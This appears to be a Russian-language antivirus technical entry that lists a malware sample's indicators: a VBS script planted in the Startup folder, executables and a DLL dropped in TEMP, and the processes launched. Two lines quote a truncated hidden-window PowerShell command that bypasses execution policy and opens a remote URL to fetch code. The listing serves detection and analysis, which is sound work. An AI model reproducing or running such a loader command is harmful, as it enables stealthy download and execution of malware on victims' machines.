Техническая информация
- %HOMEPATH%\start menu\programs\startup\u.vbs
- %TEMP%\s.exe
- <Полный путь к файлу>u.vbs
- %TEMP%\nsr2.tmp
- %TEMP%\nsl3.tmp\findprocdll.dll
- '%TEMP%\s.exe'
- '<SYSTEM32>\wscript.exe' "<Полный путь к файлу>u.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...